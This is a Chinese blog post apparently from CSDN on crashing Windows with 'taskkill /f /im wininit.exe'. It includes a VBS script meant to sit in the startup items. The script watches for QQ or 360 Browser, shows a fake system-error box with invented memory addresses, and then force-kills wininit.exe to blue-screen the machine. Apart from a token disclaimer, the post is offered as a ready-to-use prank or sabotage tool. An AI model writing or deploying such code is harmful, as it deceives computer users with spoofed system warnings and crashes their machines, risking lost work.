怎么让电脑快速蓝屏

首先声明:请合理使用以下技能,不要搞破坏,no zuo no die!

以下讨论基于是Windows环境

很简单,首先同时按win+R键,启动运行,然后输入:taskkill /f /im wininit.exe,然后按Enter键

很快你的电脑就会蓝屏了

原理解释:taskkill -f -im(等价于 taskill /f /im) 命令用于强制结束进程,而wininit.exe是Windows核心进程,一旦强制结束,电脑就会马上蓝屏

运用:

你可以利用这条命令写一个程序,阻止其他人访问你的电脑,将写好的程序添加到启动项,例如每次启动要求输入密码,如果规定时间没有输入或密码错误,马上调用该语句,电脑蓝屏(注意:一定要测试好时间,确定没有bug,再添加到启动项,不然电脑开机就蓝屏会让你很恼火

vbs代码:

On Error Resume Next
Dim addr,pipe
set obj=createobject("wscript.shell")
Do
  set addr=getobject("winmgmts://./root/cimv2")
  set pipe=addr.execquery("select * from win32_process where  name='QQ.exe' or name='360chrome.exe'") 
  for each i in pipe
    msgbox "系统发生未知错误!" & vbcrlf & "地址:0xf0000f04f 0x00f04fff",16,"警告"
    wscript.sleep 6000
    obj.run"taskkill /f /im wininit.exe",0
  next
  wscript.sleep 6000
loop

解释:检查进程中是否有QQ或360浏览器(通常开机会自启的程序),如果有显示提示:

看上去像系统发出的提示,只要你关闭该窗口,6s后电脑蓝屏,如果不关闭则不会

 

展开阅读全文
©️2020 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值